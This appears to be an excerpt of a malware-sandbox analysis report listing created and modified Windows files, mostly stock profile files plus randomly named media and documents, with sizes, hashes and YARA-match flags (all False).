C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa 0.98 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms 28.53 KB False
C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg 5.15 KB False
C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg 66.80 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg 5.52 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore 2.02 MB False
C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt 12.43 KB False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms 512.53 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini 0.61 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm 0.75 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat 32.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl 1.44 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx 3.99 MB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml 0.78 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log 2.00 MB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk 8.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 30.24 KB False
C:\Users\Default\Favorites\Windows Live\Get Windows Live.url 0.66 KB False
C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf 37.41 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat 16.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png 66.05 KB False
C:\Users\Default\Favorites\MSN Websites\MSN.url 0.66 KB False
Modified Files
Filename File Size YARA Match
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm 0.75 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB False
C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 22.89 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl 1.29 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm 0.76 KB False
C:\Users\Default\ntuser.ini 0.55 KB False
C:\Users\EEBsYm5\AppData\Roaming\40id.mkv 85.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm 0.78 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms 28.53 KB False
C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url 0.66 KB False
C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg 2.40 KB False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js 0.54 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm 0.75 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount 1.18 KB False
C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg 76.34 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb 66.93 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl 1.78 KB False
C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg 6.78 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm 0.75 KB False
C:\Users\Default\Favorites\MSN Websites\MSN Sports.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms 28.53 KB False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi 3.02 MB False
C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 56.22 KB False
C:\Users\Default\NTUSER.DAT.LOG1 193.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat 32.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods 63.59 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl 1.58 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb 1.02 MB False
C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat 32.53 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl 1.55 KB MD5: 14d44a791b667848a60c6416e8e2184a
SHA1: 74a8ca16ec8ce6cc5e42aff51b4dd3ed8eecd161
SHA256: e6cd0ef2d4976605e234163f25414006fcfd911fd85723fb5d4e28a51062c0ee
SSDeep: 24:43BznA3zBeLYYeVFhKGLwc7/ScPGQ10zdvdVnijCtN6Ora/IBKCXuxRZl+XO62FR:azhLYYe/Y+waxPGQm9nxpgCORP2O6YR
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore 2.02 MB MD5: 196c53d5bec2b1543186a01c430d87ac
SHA1: 2b66308da8a93d784da9040440b1dc0389511d4a
SHA256: f519cc6497eef1b721d8fdafd6263a4a4f89303986bb34b8c078c649956dba3b
SSDeep: 24576:oXDD8PQSkf/8obA3h+R12xkb2L++c0oTFDurAwigWN:OSbItA+DskbkZpoTlIXi5N
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url 0.66 KB MD5: 9cd88b374f86257b7f7470ef294da5bc
SHA1: fc11f82fffd3aae354eba1fab8659b1a5c84e348
SHA256: a7bf0040241354f85517c2d9de8623091b9c4418754fde2199781fd8aff043de
SSDeep: 12:7bLpx1/fqeqgRMJklOHocjPEOPG+k01o8dj5H49lUoilZBKYus5qFvZfe387Vw0C:XLr1/M/1IYNk0C2q9lUP8Y+vF7Q
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm 0.76 KB MD5: dcea0afa183d29732fa2c7a088ec95ab
SHA1: 0b097632c02c7099ce62a2e45995dedaf898ca34
SHA256: f8acaf6ce09a0ea669f69468d469f5826d4cb7627987810c2de20ab7bc971789
SSDeep: 12:uN3I82QjtUMkYlUYQlvzsWbVpOZOhKCtuDbSiSyX+AfjdHS9FeyyoayJORckK3ZC:QIC5C7zsaAZOzASNWjyLyNgO6kKw
False
C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log 0.63 KB MD5: c3584fc08cee9060a3d9e598430be647
SHA1: 89703490dfbcc4675b1dab42d121b029fab1c89c
SHA256: 892cc2087d18c329f17bafbef274f85319011cd901048d3b48600878afb33b69
SSDeep: 12:lhnMSc3HYk2aGBMT0KGXAAmJOyKN3Bj6yYyAuGrhb5z8DsukYOBtrx8O3NcC:lhgok2actfAo/Bjd+zBR8DeY81x39l
False
C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 69.36 KB MD5: a5a4129912e9564e3be3bcb1af32ec3f
SHA1: 0d7c9e20d22487943c0a0992aa7d9297e9e4913f
SHA256: 6c51b6af01ecb0c7cc2ec54d57f84db27f0e26a20b431df46b2a5cf81a88f9d1
SSDeep: 1536:opE89ZekWkl2yZnNYFXBtVK69akpqLIpXtukZST0rEMzag:opTQkkyZn2FXjr9LpqsdtuwSi
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm 0.75 KB MD5: 455ba2fa50e8a383a2a057a3e3e6155d
SHA1: 477a409464633254ba13e8dcb5cee1078f41c25c
SHA256: 4addb9ed87bbf24fbbca0624ed7c81875b7d57a46bf72948b898d0e2785fc366
SSDeep: 12:jPLlsKtOAaj7GybmR4r/vjOkN8QCNmVLdodLNMEtxyk5a9HChiWjc5SC:jLgDiG7vCkN8pNmVLuwcxyPB3Xx
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg 4.65 KB MD5: 7d5480e07788cd9010dabbff1669a6e2
SHA1: 068424719033bd5df5e53bbfb265157ea3fe7524
SHA256: 2d1684aab91586b76d91663f99370d604962868df99ffdd52ac62601c2f80687
SSDeep: 96:ZsKlrRaOCE/gD+lsp7aIG3x8lVxs3ZRU8DpfennXMyu0FdZ3bPn+sanbpd:GkruylhtxCVx4ZBpfen8KbZrPn+vd
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url 0.66 KB MD5: 206e667224c1717de0f052eaa3588a71
SHA1: 2e6e0d087d9566198c51765afd3da88cfd23c403
SHA256: 48f46f586f1edc0675a0c69f824cc6beef1e53691638fbc0391ca3bcc5d75d10
SSDeep: 12:LzC7wwswpSuHMr22AwnZT7EWbN/PLUeT1E3oRD6d8B9D8vWzvIGhOjlCC:K7FxpSuHU2KZT7EWJ7Ze37wIX
False
C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi 49.27 KB MD5: 8e738dbdc24b8dda784c5714d3afa8a7
SHA1: 3ef14211ceef313e36e63cd0315f80062fe70cce
SHA256: 9df25a7ff0228df01029b66958668982f114c7b1b0ca4ed88d7aa47c6863de19
SSDeep: 1536:a6ekNk5bjEHrA9m/HqXu7EEi6bE48+halab0:8IkVELA9m/H97EEi4j0
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg 1.58 KB MD5: 17f06d07bf929d4bed7af1c6f2c2f05c
SHA1: 4d81ee399067f36a163ab365cf2aeea139a705da
SHA256: 82e80a283feb8493fa9709a586b9df293ba149fb8403908549b19f4faee7eb45
SSDeep: 48:ltKoDhdsGLCRRkoTPRwnGsMe0G+H5rQKmUsi8h9GrUaepP:7KKdnCRRkoTPL9eMHBJSErUa0P
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl 1.52 KB MD5: cf453a97102743d3378816bdd47c0e40
SHA1: 80c615dfca15f61814b6877f20e90caa0ba819c5
SHA256: a2e95e104cfe60923d26bca185c234c495a9680f842ef9026c85c2748b33caf4
SSDeep: 48:oihkrMA3O1ZhzykkhDTdqo2+kBrH7MpJWKP:3hklS/khDUr+0oJrP
False
C:\Users\Default\Contacts\Administrator.contact 67.31 KB MD5: b7ff1843a78c41bbbac5103f6e985e4d
SHA1: c1ab89f100e691ae952c04bc41d70ee31565e374
SHA256: 059759c37f45a5afb39056d9d2460d1fd045f40fed6625737d607d4ccad78a8a
SSDeep: 1536:MReYumf8vkzcUyt1BgXQgpX2ye37LwP1yC2noAoyfX:MkYu+8LUYLUQ2mfwIZoy/
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg 10.85 KB MD5: f5b1ec958e690f158ac7c92ded10b731
SHA1: f9e929a49efd7c06da458682e1821eb2880c222c
SHA256: aa6c72d2b55fa17e8a23806cec60a29ce99333396b604a6a42a71bfaf6e8fe8c
SSDeep: 192:CL90BYWjLQf0azFpTSOUZ87lFifdCMxlA+1wjJOHy/C+awKMcnEybW5GpMy:CLSKSLWzTAZ87TifdCMxlQNOHyHakcn9
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat 8.92 KB MD5: a9a673b83eaebfad079abaea7c497dfc
SHA1: 4c020c986c8aee74eba6cb897f961ad257c157d5
SHA256: 3ea4b2d698b8b22609817b0a9ff0248177b08be2f02300cadbde4e23dffa36fe
SSDeep: 192:GiOCi9RAcymoWiwxEb7cgg1lZFwMe7yoXvQkF6tWSXu:gRUmo6ib4gAlDwMe7nVFqje
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim 10.00 MB MD5: c2698ce163e28905ff84891238959589
SHA1: 9be2f65b63f7ec6be7f10e70c343b9e2f4b52539
SHA256: 0fe434114080e778e0712b3665a4ca1c73ed7e9d115ccb916eb49e215dba6829
SSDeep: 196608:96aX6gTQIGkqojQRljrffo1feRTC+JO2Lg9VgqBpiTGWv8tvgwSDP:R7cI1jeljrffowRxdLgjciWv8tvgV
False
C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a 97.23 KB MD5: 29ecdbbca561061dd6666fa8613a8363
SHA1: 774057da038f3b8229e21731f39efca909a3fdbc
SHA256: 9760d330419d04407ce1a0ca985323465388fdef2d4dace8d7dfb9d7ecef4ab1
SSDeep: 1536:/mMcikbMxvbnnRBuhxr3WVXSz3CuCNisVZQl6MA1+qoMWJ4kTf9t8X:/ZciQMxvbLMxaVX03PCHG4Mk+qcJh9KX
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl 1.54 KB MD5: 5a6f5be7d3982b678362c882456afc09
SHA1: 330fbd200c85b3dcdf9c35214dbfeb69997361e3
SHA256: 21d64b3857f919cb96ea94d03c8079735fdd6e2fd3bbdb18cacdf0a1a59e8c67
SSDeep: 48:E6XuCg1YegXN6n7TNtvL0k++O6v1T909Akw6vlQ9:E6+MLN6nr0k++3v1ZQTlQ9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl 1.53 KB MD5: fd9eb73b7364a07d2f8ae5914dc19025
SHA1: 929adc02a68de88f516337ad6f50ce9f3fe97d28
SHA256: c5aa9bda172f301fb06696ad30ef88d2c563b218ab18146ac7586c131343d048
SSDeep: 24:urEcuhFL+Cc0Jwg1zP1oOLRsFfF8Mgm/9E22ZxMa7SyTGNu4gSBIBdOeUAZGQYic:urEcALVD1q8Ml12uyTXzSCdOePGQYMF6
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms 7.03 KB MD5: 832eb902041889733cc0ea72e0f5e8d3
SHA1: 0c12aea6cfcf4fd1c890a38db751c4eca6641fce
SHA256: 8022386178506ad9966851aa2b2df958faefbac2fc7ff9b6fd5d4fcca4227e95
SSDeep: 192:VKw/j3/3MKNfoU0zYxywbOjDTF9BPNGDMBIfuIeuC:9/j3/3oU0sxhbOj1HNoMBouIe3
False
C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp 15.71 KB MD5: 54003f1794e58f776d7947858accec3c
SHA1: ae5cae40728c78985bbb8877191568b40d37def9
SHA256: 2f368e817ac686c204873635f8497ae1aaf0c7c7370aac23067f46787bb8041e
SSDeep: 384:b700KL/A0iAh9tfodWfSukcmAzeGErVl8xiD05Sf:4tXh9tgcSfDzAI
False
C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a 2.09 KB MD5: 28647c40bde73c36643dda2040237e2a
SHA1: ddf8cb87d6bfe9c5e73d5ad24c2f72faef62314e
SHA256: 980073dc28c25b51b5298294c29fa80950a0dbbd480a8bebe71455070b87ca91
SSDeep: 48:VVNtNMvSQgq28uDWF33jGzRwGX/ZxrBU5E3Ds4rzLgWAF0W0ZD3Fq:VVzEhgqEDWFDUtXRxr2asHEfU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl 1.78 KB MD5: 02b2a2a5381dd2193f9e94d3f06db25c
SHA1: 15828659893d102b9468418ae9c824f151475530
SHA256: 87248771f32c1691ba60f255e5b6853f93daed59d8fd4b09a584dece01a85601
SSDeep: 48:8w0G71mqFrZOY98c/5Pe5jSML+TZ6yU8CO4UZQQ2MKZod:SG5tZO9c/5G5Dh6gk
False
C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf 25.21 KB MD5: b97c6795dad8db7892aed6f14215ff8b
SHA1: 904ddb24d34f439b7aedb82ad0d78269636d5ff1
SHA256: d11d6b1128294ce2cf01c12d207854eb080aaf2b9effb2e5a8235b3a93be3ca9
SSDeep: 768:CYqk7LA0UiKmU+YWclDiMejsHHWpekJFmC:zD7LA0PKm5Yz2MejsHMeIEC
False
C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp 66.22 KB MD5: 4864882cd403a18bb0737438a3da58b1
SHA1: 98c22a826221a2ab4e8fddeb635e865d3362005f
SHA256: 7321483960b6937143f106d083f887fdba0c09fcfd97dfb0ea16c2e19a02f3d6
SSDeep: 1536:9PsC7Aovxj8SiER0CwVWmVhDJKeE3V2gH1AilqxTmvFeFOLfUuVizN:ZV7sSDw4mVLOAm5UFtuC
False
C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi 7.96 KB MD5: 7ae121cd98cb40e4033162243ceca69c
SHA1: 5589463c11c1e0096578d9aea36eb3ede7526555
SHA256: 4f126b31c91afc01d536f4280b5b725c58d5bf5c971b20b45b19b776467f7cdd
SSDeep: 192:DeWwhg8jielQaiIwL90UQfh/V53ACXEogX:qWw/+aiZGUQhfX5gX
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata 5.80 KB MD5: c6edb72e9f798253256bc5183f6f35ea
SHA1: 6cbdddb17be4df8f18cbc7055b9594fc322986ed
SHA256: 8f6fd56f7fda672de691175d395885593e852d7f40f5f017c2dc9fd17d12b351
SSDeep: 96:Sp6oVfDpryMAJ5XnXogElA4U4AphxbIBjQUAZ0+hydYaSrl34lLYgSnxJEkY:ScoJDdyd/XKlAn4AFbIEfUdY3rlIlLYw
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml 0.61 KB MD5: 6d7313243fe5a428086e2e714b99593e
SHA1: 3890ed18f93e7ca4e2881eb6ca7271609716799a
SHA256: 4bb5e9369c04f845e08a5d83574e5c71441d4d80f1bc00546af2b34ef163e222
SSDeep: 12:2Exthn1eQBa6JRTvFeNXLULMB+FsFsApiw5It6FIKvhfTaa0+2C:2Exthi6JRTvFYYMIAp5544XvhfTHLb
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT 382.03 KB MD5: 1d38665ea206e7370e18b16be17188d0
SHA1: bff901a929ec4dedb039c6c4fe3dc695734577f1
SHA256: 6b7bcc573729d5388f6fccef563fee67ff8031accce6e8ca9380fcba7f7efb49
SSDeep: 6144:CPDnnXPETcoRAX0raqZZyqG/0ZSuOmmDwhewMcPZV+qIYdpetwXA7AUSrdxuoPf7:sf2GkraqZscZSdmnewhn+q5dpetwXA7g
False
C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi 37.43 KB MD5: ac4f762ff81bc8716eaedd2db75386cf
SHA1: 2269acd985e14b689cdf4894d52ccb4ce77d03f2
SHA256: f05e17959f8f307dfdf3cb1f1432a71829d7af09bf8a095e46b32eb9284b3589
SSDeep: 768:+fTFDZn1ROqmRM3OR1eXX03YX0YGRsxXj/eJDKzJxjO26PmenTpeJpZrrx7NxkK:+fTZZGqm63OR4XFwspWDKz6TpoZHfOK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log 2.00 MB MD5: 01941b4ea3545bed637450fc70157732
SHA1: 0f858614c72e456d5fd2621ea88a3aa1e407a46a
SHA256: 4ed723f5cc505090301a154f2c9a9e372d1df2c9197b0a9ad4771cfc66cd5e16
SSDeep: 49152:N0QDZMLPrYBPYG9ygECdNN5BzD7S5XzvY1V/6rdFb+ncT7Whyo5:NXDaLDYBPYG9y8NfBLS5XLWhql+cT70
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs 2.00 MB MD5: 91d982e45fd1bddaa7380a32dd48b0e4
SHA1: 698d63fb446b580df3bc412bd27e3bc8ba1ec198
SHA256: fffa2de436f7e7c9573d0081a76734b764a19d7e40b99070b126196ca214b5f3
SSDeep: 24576:OTIC8F1cMn4jjV9B5M5f9Cg1XGgR4lLvivYKHH4luz:OE1N4jjVpwfkGR4lLviQKHH42
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl 1.10 KB MD5: 4faec776691fa7c568bee307b76674ba
SHA1: 3302e1216e7926ae7ba83671c54fc8dca1ef0770
SHA256: 9e870133f6176f1344bfc7c5a9a3aef3f50b9fbfa66c86590b5407b92f83ac88
SSDeep: 24:zQGnb9zJ66XZEjvDWimrRcRdjsfRwxDiuCDYpMdURmpuH8:p9zJ1wVGcLjSEyF
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST 0.55 KB MD5: 1a696ccc254483f721f440cbcd8d93b7
SHA1: 9382f35d6166e96e20868cf8c7f0db83cad64b26
SHA256: 6694748ca8190d255b42a0a39266ce4623affbc1c1061aff3e03808d1041968d
SSDeep: 12:s/jYxQmOWMu6GFmq4fe6XaCWxb+y+qyPP0+wX54LSdZYBolf94dS/kLvKtZIRhCx:Mj5WshnfeZCob+yHyPP0+wX54LmYelfN
False
C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url 0.66 KB MD5: 956c473697185117bf199612f0defb23
SHA1: 728a23eeda010cce31d7afa334d6b02af436b04d
SHA256: 0952fe3d1670dd4e40768cdf2a8a12b460a85fd6ce6d454344db9404db724aa0
SSDeep: 12:TTubjDXxVWmqxCkUxPCP6QMt5kXEGen0hxr+25waqLWFA+raI6dlgOC:WbpYmqEkUlDQMteEUh1+Wwa6f8FTj
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat 16.53 KB MD5: f282e46fd54553795d391cf898330d90
SHA1: 2e340d5d56cb6b30afcbc4023a41303ea393af70
SHA256: 3f2dd58706c1799db68afbc98e8a6d4de96475995fe681c35d60791da22c51bd
SSDeep: 384:AzG6bARYK1yE6H0lq2/8+Lp6GA1WMrC0mk9tnREG:6534yE6HuVQKMmrmdR1
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm 0.76 KB MD5: 37051351dd6d04989be0f964a6d1991e
SHA1: 8413c6047150aea580c48e548c84a50550357130
SHA256: 97ae678ce34a10559c0b637a9c268c66a172a6e42909842226b194562d8b2bd7
SSDeep: 12:XUaRRKcnkVBbTtnOoZn+G4Z6tg1FwoMVdlQigrAaZLt/TUcTjsjuiVC:kaRIusrOc+5qyfMVgiN0Ucf4O
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg 7.86 KB MD5: 511812a460e4c536efd0b5c993fc6419
SHA1: 84cbc4fbae9528d87994e86155a594d17f6e658b
SHA256: e055b542e29986e7005ea09a17ac241ea398aeb36ec705721cc671e45babb002
SSDeep: 192:+zYvoBDHHXnUe1smWVTIlVdeP40GvqIbtjXvcrZ:+Y4DImWVTIX440+qszErZ
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred 0.55 KB MD5: 32939e09cdeac9643050ad318a522e56
SHA1: 7aa7597c1a17e76e09079e719e530362084b0790
SHA256: dfae25f385281e900fad752e4e34579a4c0db80ec7187279a1ac00d7e8eef05e
SSDeep: 12:UtwRUy6KEHhXt9LODgUEKglk1LMgfCQji2cAE9TLX8NUC:GCUyBEHhTvUEjlk1kQDcBTO
False
C:\Users\Default\Favorites\MSN Websites\MSN Money.url 0.66 KB MD5: 23d1ed4bffb441e2c99d65a94b87cfb3
SHA1: 8a1a4f419a2ca70f529e7c0ada6e1a4bdeb2b496
SHA256: 80cfa5e76e18dc92663804341eb11e315c09104d573df5119d6de54c9cd09fbb
SSDeep: 12:5C+VHUbxWCjdbAkgCx+87qo3+dlxh2dnuFRCrp8QuEQBeezy3U6i1uQpaSSJfLpy:1j4lAD4+W7+d3h0uFs5IBeMy3K1uQNWc
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms 512.53 KB MD5: 9eb242071b7b4703f68cd8dfdfa1ab77
SHA1: eacddb71bda9e44bd0a024c1b7900f13796cc930
SHA256: 19609237a8a93c47e0787e5fd3ac8897cc7292164403f0d3de3c7cff4d5126c8
SSDeep: 12288:CnKgw+1O3bEca3Lf1ZlU4h1+jGmBRPBhNaRdAHDVIYsrqQ1DSLCyuXX:gKx+8Gpfz+tPBXaR+2wQYLLuH
False
C:\Users\Default\Favorites\MSN Websites\MSN Autos.url 0.66 KB MD5: 17d35b10425bc0320e9345b3afc79280
SHA1: 1036e8ac75e92f18e33396565b96c80ca3efcb69
SHA256: 5aa7d1c892e221045786ddfe852c62b70fa6a291111d23813a7e3496547ec9b8
SSDeep: 12:QAlJEo1ubFxMlLdGDBToGmT4Vex76l4nSHNVTF0R5OZRZfH7fjsTnKs7w9w66E8O:/lOMWILdGD1oG8b5Y4Ifp0R5OvZfzo2L
False
C:\Users\Default\Favorites\MSN Websites\MSNBC News.url 0.66 KB MD5: 11ee7caf3bd1a1e3d116baa4a16160ca
SHA1: 61d84ff4ffc844cf47a8713e454bc4f6f9bb9a33
SHA256: 41e06d71700253797a8d9b003df5379ad8398c9c0361accedcb5a014fd772ff9
SSDeep: 12:j1ga981AgUNpydV1DWN9ecZlgBQzGKXgH0F3ySakReX8L6POGEIuC+C:Wa98ygbV8NZlgBQiPH0F3ySNziuEz
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount 2.00 KB MD5: 3291e82d938cf3039fdedca46c32716e
SHA1: 207a6c1199be9085469a99b7c8937305c361ec1e
SHA256: 3657fa7e648068cb0fa3c48d79d4367447a639c1e7a213d2386eafffd2d23a2f
SSDeep: 48:cmvweUO2A+3RNueO9YbRKPk4eF6t4puSDia2fdb8+:DvhD2n3hIYbmk4cQg258+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount 2.22 KB MD5: 2ec450d27a3d3fa61d4db36b38a45883
SHA1: 9f3044b993f556db5f1b5024b6dd0d9b7ff12c4d
SHA256: 4de0d0dd96986ef80b3008002196ccd3ddd236f50d8c55c6131d8f44f86dc201
SSDeep: 48:2c0+hdbKgCX/QsXzKQe0oovO1iGR+LBerSKtdJsztshk:5hdBCX//jKQqIqfaQr53J4b
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML 10.48 KB MD5: 31b570bda9928cfa77b9400c3ac2de0e
SHA1: 72e523eed3a81bb9f3693a4288da3920aeafc589
SHA256: 219dd9f408c06c70a6a104dd798f6dae6cdd56998c777eedf7ebb223a2fbe389
SSDeep: 192:/C1gFyOc4zneB7wNsRGEkLcfmAGnpuBq9OAeTSm07awj68pDcJ:/C14NzzeeNpMiWJyewj68pQJ
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf 64.53 KB MD5: cf70009edfe6b7bf9ab21615aa245a60
SHA1: a16c3de68aa58ceb3d8bff4524bb4ac4c7d14ac9
SHA256: 814a73151f58f5cc090c5c1c29a12327f5594574320ab0bb6f7ef71dfd6c9bed
SSDeep: 1536:yrT0nD5xld8XUtnqb4Mpu0V/V15zGrInJ5lQBLb17S:pDld8kRXMAQ15zGraFSL5O
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl 1.57 KB MD5: fdb27fa5d8e110b20ea0db7f356e68c4
SHA1: 680432600d4177adffc494a76a13a2746c069802
SHA256: bddb078e38e4dcefba9daa3700d6387120d60513699638219503b3c54803a13c
SSDeep: 24:MULj8w0+sz36wOkqoxtFzsqhjBHfJMegtQ8kQZ+ct6pv8BtKIBy95XvF9TTrQ/kf:zLcAElzsiXMegtYQ0cIpgBy3/3QIoq+K
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms 28.53 KB MD5: c642dccbaabc1ac5d2070a10b1486449
SHA1: 8590c442b6ed2906f59140c75fc63429a2721ebb
SHA256: fb30fb269d6ec5bbd38d8b150569c7025ca9d410b475861571e77fb6dc64cf2b
SSDeep: 768:FUCViHlB+poF5alVgtuK4n7EBrdXnz3CxU305Fw1:FUCViHj+6F5alVg34n4BhXO071
False
